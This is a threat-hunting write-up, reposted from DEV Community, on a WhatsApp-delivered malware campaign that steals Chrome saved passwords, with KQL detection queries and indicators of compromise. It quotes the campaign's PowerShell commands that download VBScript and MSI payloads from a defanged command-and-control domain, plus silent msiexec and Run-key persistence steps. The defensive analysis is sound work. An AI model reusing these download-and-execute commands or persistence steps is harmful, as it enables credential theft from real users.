WhatsApp malware campaign targeting Chrome credential vaults

This content originally appeared on DEV Community and was authored by Puneet Jena

While hunting for malicious PowerShell techniques, we identified anomalous behavior indicative of staged payload execution.

Initial Access & Delivery Chain Summary

• Threat actors leveraged WhatsApp as the initial access channel, sending messages to multiple employees within the organization to build trust before sharing a malicious ZIP file. Since ZIP files cannot be opened on mobile devices, users were compelled to access the archive on their endpoints, where they were deceived into executing an embedded VBScript payload.
• Execution of the VBScript initiated a multi-stage payload delivery mechanism, where it:
• Downloaded a secondary VBScript and an MSI installer from a remote C2 server (varegjopeaks[.]com) and saved them to the temporary directory.
• Executed the MSI file silently via msiexec.exe, which dropped an additional VBS script named “installer”.
• Created persistence by adding the installer script to the Run registry key.
• Downloaded a specific Python environment and executed a PowerShell script that profiled the installed Chrome version and downloaded the official Chrome test automation driver.

• Accessed and exfiltrated credentials stored in the Chrome password vault, continuously harvesting newly saved passwords due to the established persistence.

• Observed Malicious Execution Activity

WScript Executions

• "wscript.exe" C:\Users*\AppData\Local\Temp\baixa_sscado.vbs
• "WScript.exe" C:\Users*\AppData\Local\Temp*.zip.0e6.vbs
• "wscript.exe" C:\Users*\AppData\Local\Temp\installer.vbs

PowerShell Download Activity

• "powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/baixa_sscado.vbs' -OutFile $env:TEMP\baixa_sscado.vbs -UseBasicParsing"
• "powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/teste_obscado.vbs' -OutFile $env:TEMP\installer.vbs -UseBasicParsing"
• "powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/installer.msi' -OutFile $env:TEMP\installer.msi -UseBasicParsing"

- Msiexec Execution

• "msiexec.exe" /i C:\Users*\AppData\Local\Temp\installer.msi /quiet /norestart

Detection query :

There will be false positives in the results, which must be eliminated through validation and filtering.

DeviceProcessEvents
| where InitiatingProcessFileName contains "wscript"
| where FileName contains "powershell.exe"
| where ProcessCommandLine has_any ("-enc", "-encode", "http", "https", "Invoke-RestMethod", "New-Object Net.WebClient", "System.Net.HttpWebRequest", "DownloadFile", "curl", "wget","iex","iwr")
| distinct ProcessCommandLine,InitiatingProcessCommandLine

.vbs & .msi Execution Identification :

union isfuzzy=true DeviceProcessEvents
| where FileName contains "powershell.exe"
| where ProcessCommandLine has_any ("-enc", "-encode", "http", "https", "Invoke-RestMethod", "New-Object Net.WebClient", "System.Net.HttpWebRequest", "DownloadFile", "curl", "wget","iex","iwr")
| project DeviceName,T1 = Timestamp , ProcessCommandLine , InitiatingProcessCommandLine
| join kind=inner ( DeviceProcessEvents
| where ProcessCommandLine contains "wscript" or ProcessCommandLine contains "msiexec"
| where ProcessCommandLine contains ".msi" or ProcessCommandLine contains ".vbs"
| project DeviceName,T2 = Timestamp , ProcessCommandLine1 = ProcessCommandLine , InitiatingProcessCommandLine1 = InitiatingProcessCommandLine
) on DeviceName
| extend timedifference = abs(datetime_diff('minute', T1, T2))
| where timedifference < 1

Reference :

• https://www.joesandbox.com/analysis/1801119/0/html

IOC

• 36805f82166acf711007ab42e0e4147c10c7639fbf94eac9a1d26401e91a26ea
• 8041b6cdeb3a4502066d18d024e671577dda23d4a1e4d083f34fcbfa39469279
• varegjopeaks[.]com/altor/teste_obscado[.]vbs
• varegjopeaks[.]com/altor/baixa_sscado[.]vbs
• varegjopeaks[.]com

This content originally appeared on DEV Community and was authored by Puneet Jena

Print Share Comment Cite Upload Translate Updates

APA

Puneet Jena | Sciencx (2025-11-16T21:57:12+00:00) WhatsApp malware campaign targeting Chrome credential vaults. Retrieved from https://www.scien.cx/2025/11/16/whatsapp-malware-campaign-targeting-chrome-credential-vaults/

MLA

" » WhatsApp malware campaign targeting Chrome credential vaults." Puneet Jena | Sciencx - Sunday November 16, 2025, https://www.scien.cx/2025/11/16/whatsapp-malware-campaign-targeting-chrome-credential-vaults/

HARVARD

Puneet Jena | Sciencx Sunday November 16, 2025 » WhatsApp malware campaign targeting Chrome credential vaults., viewed ,<https://www.scien.cx/2025/11/16/whatsapp-malware-campaign-targeting-chrome-credential-vaults/>

VANCOUVER

Puneet Jena | Sciencx - » WhatsApp malware campaign targeting Chrome credential vaults. [Internet]. [Accessed ]. Available from: https://www.scien.cx/2025/11/16/whatsapp-malware-campaign-targeting-chrome-credential-vaults/

CHICAGO

" » WhatsApp malware campaign targeting Chrome credential vaults." Puneet Jena | Sciencx - Accessed . https://www.scien.cx/2025/11/16/whatsapp-malware-campaign-targeting-chrome-credential-vaults/

IEEE

" » WhatsApp malware campaign targeting Chrome credential vaults." Puneet Jena | Sciencx [Online]. Available: https://www.scien.cx/2025/11/16/whatsapp-malware-campaign-targeting-chrome-credential-vaults/. [Accessed: ]

rf:citation

» WhatsApp malware campaign targeting Chrome credential vaults | Puneet Jena | Sciencx | https://www.scien.cx/2025/11/16/whatsapp-malware-campaign-targeting-chrome-credential-vaults/ |

Please log in to upload a file.

There are no updates yet.
Click the Upload button above to add an update.

You must be logged in to translate posts. Please log in or register.